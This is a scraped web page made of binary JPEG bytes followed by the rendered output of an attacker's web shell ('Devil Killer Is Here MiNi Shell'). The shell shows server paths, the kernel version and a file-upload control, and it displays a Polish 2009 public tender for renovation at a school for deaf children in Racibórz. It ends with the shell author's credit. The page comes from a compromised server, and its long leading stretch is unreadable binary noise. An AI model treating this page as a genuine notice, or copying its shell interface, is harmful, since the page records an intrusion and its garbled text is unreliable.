JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090217/31182-N-2009.html

<p class="kh_header"><b>Racibórz: Roboty remontowe w budynkach SOSWNiS w Raciborzu, w tym:
Zadanie I - Remont klatki schodowej - remont schodów - w budynku Internatu (budynku mieszkalnym);
Zadanie II - Remont podłóg - wymiana wykładzin PCV w pomieszczeniach budynku Szkoły Podstawowej;
Zadanie III - Malowanie pomieszczeń w budynku Szkoły Podstawowej.</b><br>
<b>Numer ogłoszenia: 31182 - 2009; data zamieszczenia: 17.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalny Ośrodek Szkolno-Wychowawczy dla Niesłyszących i Słabosłyszących , ul. Karola Miarki 4, 47-400 Racibórz, woj. śląskie, tel. 032 4147334, 4152255, 4153001, faks 032 4147334, 4152255 w. 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oswnis.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe w budynkach SOSWNiS w Raciborzu, w tym:
Zadanie I - Remont klatki schodowej - remont schodów - w budynku Internatu (budynku mieszkalnym);
Zadanie II - Remont podłóg - wymiana wykładzin PCV w pomieszczeniach budynku Szkoły Podstawowej;
Zadanie III - Malowanie pomieszczeń w budynku Szkoły Podstawowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót remontowych i renowacyjnych w budynkach i na terenie SOSWNiS w Raciborzu. Przedmiot zamówienia został podzielony na 3 zadania w ramach których, dopuszcza się składanie ofert częściowych. W tym:
1)Zadanie I -  W budynku INTERNATU (budynek mieszkalny) - Remont klatki chodowej bocznej, w tym:
-  remont schodów -  rozebranie stopni drewnianych na sklepieniu ceglanym lub betonowym, zerwanie posadzki z CPV na spocznikach, przygotowanie i montaż zbrojenia, wykonanie schodów żelbetowych prostych;
- rozebranie starych i montaż nowych balustrad schodowych prostych,
Szczegółowy zakres robót dla zadania I określony został w załącznikach do SIWZ

2)Zadanie II - W budynku SZKOŁY  PODSTAWOWEJ - Remont podłóg i wymiana wykładzin PCV w pomieszczeniach, w tym:
- zerwanie starych posadzek i cokołów z tworzyw sztucznych;
- rozebranie podłoża z płyt pilśniowych,
- ułożenie warstwy wyrównującej z płyt OSB;
- ułożenie wykładzin z tworzyw sztucznych zgrzewanych.
Szczegółowy zakres robót dla zadania II określony został w załącznikach do SIWZ

3)Zadanie III - W budynku SZKOŁY  PODSTAWOWEJ - malowanie pomieszczeń, w tym: 
-  malowanie klas, korytarzy i klatki schodowej,
-  malowanie stolarki drzwiowej.
Szczegółowy zakres robót dla zadania III określony został w załącznikach do SIWZ.


Wartość szacunkowa zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust. 8 ustawy  z dnia 29 stycznia 2004r. Prawo zamówień publicznych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.13.00-1, 45.26.23.10-7, 45.26.23.00-4, 45.43.21.30-4, 45.44.21.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie każdej z części zamówienia mogą ubiegać się Wykonawcy którzy:
1)posiadają uprawnienia do wykonywania działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 pkt  1 i 2 obowiązującej ustawy prawo zamówień publicznych;
2.Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, na podstawie przedstawionych przez wykonawcę wraz z ofertą dokumentów i oświadczeń..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Zadanie  I:
1)Oświadczenie Wykonawcy o spełnianiu warunków z art. 22 Pzp.  W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy w zakresie w jakim spełniają warunki udziału w postępowaniu.
2)Wykaz wykonanej w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia  (dniem publikacji ogłoszenia o zamówieniu), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 1 roboty o wartości nie mniejszej niż 20 000,-zł brutto.   Wykonawca winien wykazać, że wykonał prace polegające na wykonaniu prac remontowych lub adaptacyjnych (w tym betonowanie). Do wykazu należy załączyć dokumenty potwierdzające należyte wykonanie robót. Dokumenty  (np. referencje) muszą być wystawione przez bezpośrednich inwestorów,  posiadać datę ich wystawienia, określać wartość wykonanych robót, określać termin ich wykonania,  zawierać w treści potwierdzenie należytego wykonania robót. W przypadku podmiotów występujących wspólnie dokument ten składają Ci Wykonawcy, którzy spełniają warunek udziału w postępowaniu.
3)Wypis z właściwego rejestru,  zaświadczenie o wpisie do ewidencji działalności gospodarczej lub dokumenty równoważne potwierdzające, że profil działania Wykonawcy odpowiada przedmiotowi zamówienia oraz wskazujące osobę upoważnioną do dokonywania czynności prawnych w imieniu  oferenta. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy.

2.Zadanie  II:
1)Oświadczenie Wykonawcy o spełnianiu warunków z art. 22 Pzp. W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy w zakresie w jakim spełniają warunki udziału w postępowaniu.
2)Wykaz wykonanej w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia  (dniem publikacji ogłoszenia o zamówieniu), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 1 roboty budowlanej o wartości nie mniejszej niż 15 000,- zł brutto. Wykonawca winien wykazać, że wykonał prace polegające na wykonaniu prac związanych z wykładaniem podłóg z tworzyw sztucznych .  Do wykazu należy załączyć dokumenty potwierdzające należyte wykonanie robót. Dokumenty  (np. referencje) muszą: być wystawione przez bezpośrednich inwestorów,  posiadać datę ich wystawienia, określać wartość wykonanych robót, określać termin ich wykonania,  zawierać w treści potwierdzenie należytego wykonania robót. W przypadku podmiotów występujących wspólnie dokument ten składają Ci Wykonawcy, którzy spełniają warunek udziału w postępowaniu.
3)Wypis z właściwego rejestru,  zaświadczenie o wpisie do ewidencji działalności gospodarczej lub dokumenty równoważne potwierdzające, że profil działania Wykonawcy odpowiada przedmiotowi zamówienia oraz wskazujące osobę upoważnioną do dokonywania czynności prawnych w imieniu  oferenta. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy.

3.Zadanie  III: 
1)Oświadczenie Wykonawcy o spełnianiu warunków z art. 22 Pzp. W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy w zakresie w jakim spełniają warunki udziału w postępowaniu.
2)Wykaz wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia  (dniem publikacji ogłoszenia o zamówieniu), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 1 roboty budowlanej o wartości nie mniejszej niż 40 000,- zł brutto.  Wykonawca winien wykazać, że wykonał prace polegające na wykonaniu prac malarskich. Do wykazu należy załączyć dokumenty potwierdzające należyte wykonanie robót. Dokumenty  (np. referencje) muszą być wystawione przez bezpośrednich inwestorów,  posiadać datę ich wystawienia, określać wartość wykonanych robót, określać termin ich wykonania,  zawierać w treści potwierdzenie należytego wykonania robót. W przypadku podmiotów występujących wspólnie dokument ten składają Ci Wykonawcy, którzy spełniają warunek udziału w postępowaniu.
3)Wypis z właściwego rejestru,  zaświadczenie o wpisie do ewidencji działalności gospodarczej lub dokumenty równoważne potwierdzające, że profil działania Wykonawcy odpowiada przedmiotowi zamówienia oraz wskazujące osobę upoważnioną do dokonywania czynności prawnych w imieniu  oferenta. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  W przypadku podmiotów występujących wspólnie dokument ten składają wszyscy Wykonawcy.

4.Ponadto w przypadku podmiotów występujących wspólnie:
1)Podmioty składające oferty wspólnie zobowiązane są do ustanowienia w formie pisemnej pełnomocnika reprezentującego ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument pełnomocnictwa musi zawierać:
a.informację, jakiego postępowania dotyczy,
b.oznaczenie wykonawców ubiegających się o udzielenie zamówienia, 
c.oświadczenie podmiotów o przyjęciu odpowiedzialności wspólnej,  
d.wskazanie pełnomocnika, 
e.oznaczenie czasu trwania i zakres pełnomocnictwa.
2)Dokument pełnomocnictwa musi być podpisany przez wszystkie upoważnione osoby wskazane w rejestrach właściwych dla poszczególnych Wykonawców (KRS, wypis do rejestru, wpis do ewidencji).
3)Pełnomocnictwo należy dołączyć do oferty w formie oryginału lub kserokopii poświadczonej notarialnie za zgodność z oryginałem.
5.Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
1)Jeżeli w kraju pochodzenia Wykonawcy  nie wydaje się ww. wymaganych dokumentów,  wówczas Wykonawca składa dokumenty równoważne zgodnie z Rozporządzeniem Rady Ministrów z dnia 19 maja 2006 (Dz. U. 2006 Nr 87 poz. 605) 
2)Dokumenty sporządzone w języku obcym składa się wraz z poświadczonym przez Wykonawcę, tłumaczeniem na język polski..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.oswnis.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno - Wychowawczy dla Niesłyszących i Slabosłyszących
47-400 Racibórz, ul. Karola Miarki 4  lub e-mail: soswnis.l.kalinska@wp.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 10:00, miejsce: Siedziba Zamawiającego: Racibórz, ul. Karola Miarki 4 - budynek główny - parter - sekretariat główny.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I -  W budynku INTERNATU (budynek mieszkalny) - Remont klatki chodowej bocznej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie I -  W budynku INTERNATU (budynek mieszkalny) - Remont klatki chodowej bocznej, w tym:
-  remont schodów -  rozebranie stopni drewnianych na sklepieniu ceglanym lub betonowym, zerwanie posadzki z CPV na spocznikach, 
-  przygotowanie i montaż zbrojenia, 
-  wykonanie schodów żelbetowych prostych;
- rozebranie starych i montaż nowych balustrad schodowych prostych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.13.00-1, 45.26.23.10-7, 45.26.23.00-4, 45.42.11.60-3, 45.26.25.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II - W budynku SZKOŁY  PODSTAWOWEJ - Remont podłóg i wymiana wykładzin PCV w pomieszczeniach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie II - W budynku SZKOŁY  PODSTAWOWEJ - Remont podłóg i wymiana wykładzin PCV w pomieszczeniach, w tym:
- zerwanie starych posadzek i cokołów z tworzyw sztucznych;
- rozebranie podłoża z płyt pilśniowych,
- ułożenie warstwy wyrównującej z płyt OSB;
- ułożenie wykładzin z tworzyw sztucznych zgrzewanych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.43.21.30-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III - W budynku SZKOŁY  PODSTAWOWEJ - malowanie pomieszczeń.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie III - W budynku SZKOŁY  PODSTAWOWEJ - malowanie pomieszczeń, w tym: 
-  malowanie klas, korytarzy i klatki schodowej,
-  malowanie stolarki drzwiowej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.21.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com